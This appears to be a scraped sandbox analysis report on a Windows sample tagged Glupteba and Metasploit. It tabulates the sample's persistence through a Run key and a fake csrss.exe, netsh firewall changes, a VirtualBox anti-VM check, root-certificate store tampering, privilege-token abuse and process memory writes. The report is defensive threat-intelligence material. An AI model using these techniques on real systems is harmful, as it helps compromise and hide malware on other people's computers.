memory/1644-2-0x0000000074910000-0x0000000074FFE000-memory.dmp
memory/2492-3-0x0000000000400000-0x0000000000420000-memory.dmp
memory/2492-4-0x0000000000400000-0x0000000000420000-memory.dmp
memory/2492-9-0x0000000000400000-0x0000000000420000-memory.dmp
memory/2492-7-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2492-6-0x0000000000400000-0x0000000000420000-memory.dmp
memory/2492-5-0x0000000000400000-0x0000000000420000-memory.dmp
memory/2492-11-0x0000000000400000-0x0000000000420000-memory.dmp
memory/1644-14-0x0000000074910000-0x0000000074FFE000-memory.dmp
memory/2492-15-0x0000000000400000-0x0000000000420000-memory.dmp
memory/2492-16-0x0000000074910000-0x0000000074FFE000-memory.dmp
memory/2492-17-0x0000000074910000-0x0000000074FFE000-memory.dmp
memory/2492-18-0x0000000074910000-0x0000000074FFE000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-11-08 01:40
Reported
2024-11-08 01:43
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
158s
Command Line
Signatures
Glupteba
Glupteba family
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
MetaSploit
Metasploit family
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\rss\csrss.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SparklingShape = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
Checks installed software on the system
Manipulates WinMonFS driver.
| Description | Indicator | Process | Target |
| File opened for modification | \??\WinMonFS | C:\Windows\rss\csrss.exe | N/A |
Checks for VirtualBox DLLs, possible anti-VM trick
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\rss\csrss.exe | N/A |
GoLang User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-931 = "Coordinated Universal Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-1971 = "Belarus Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-2871 = "Magallanes Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-32 = "Mid-Atlantic Standard Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-831 = "SA Eastern Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2142 = "Transbaikal Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2941 = "Sao Tome Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-411 = "E. Africa Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-2791 = "Novosibirsk Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-1501 = "Turkey Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-1661 = "Bahia Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2342 = "Haiti Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2572 = "Turks and Caicos Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-2511 = "Lord Howe Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-384 = "Namibia Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2491 = "Aus Central W. Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-2431 = "Cuba Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-3052 = "Qyzylorda Standard Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-601 = "Taipei Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-402 = "Arabic Standard Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-448 = "Azerbaijan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-512 = "Central Asia Standard Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-542 = "Myanmar Standard Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-662 = "Cen. Australia Standard Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-1841 = "Russia TZ 4 Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-1802 = "Line Islands Standard Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2411 = "Marquesas Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-182 = "Mountain Standard Time (Mexico)" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-2451 = "Saint Pierre Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-2571 = "Turks and Caicos Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2391 = "Aleutian Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-371 = "Jerusalem Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1862 = "Russia TZ 6 Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-271 = "Greenwich Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-1502 = "Turkey Standard Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-731 = "Fiji Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-211 = "Pacific Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\rss\csrss.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 548 wrote to memory of 4320 | N/A | C:\Users\Admin\AppData\Local\Temp\app.exe | C:\Windows\system32\cmd.exe |
| PID 548 wrote to memory of 4320 | N/A | C:\Users\Admin\AppData\Local\Temp\app.exe | C:\Windows\system32\cmd.exe |
| PID 4320 wrote to memory of 4544 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\netsh.exe |
| PID 4320 wrote to memory of 4544 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\netsh.exe |
| PID 548 wrote to memory of 1268 | N/A | C:\Users\Admin\AppData\Local\Temp\app.exe | C:\Windows\rss\csrss.exe |
| PID 548 wrote to memory of 1268 | N/A | C:\Users\Admin\AppData\Local\Temp\app.exe | C:\Windows\rss\csrss.exe |
| PID 548 wrote to memory of 1268 | N/A | C:\Users\Admin\AppData\Local\Temp\app.exe | C:\Windows\rss\csrss.exe |
| PID 1268 wrote to memory of 2312 | N/A | C:\Windows\rss\csrss.exe | C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe |
| PID 1268 wrote to memory of 2312 | N/A | C:\Windows\rss\csrss.exe | C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe |
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\app.exe
"C:\Users\Admin\AppData\Local\Temp\app.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2496 -ip 2496
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2496 -s 368
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2496 -ip 2496
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2496 -s 372
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 2496 -ip 2496
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2496 -s 372
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 2496 -ip 2496
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2496 -s 604
C:\Windows\SysWOW64\WerFault.exe
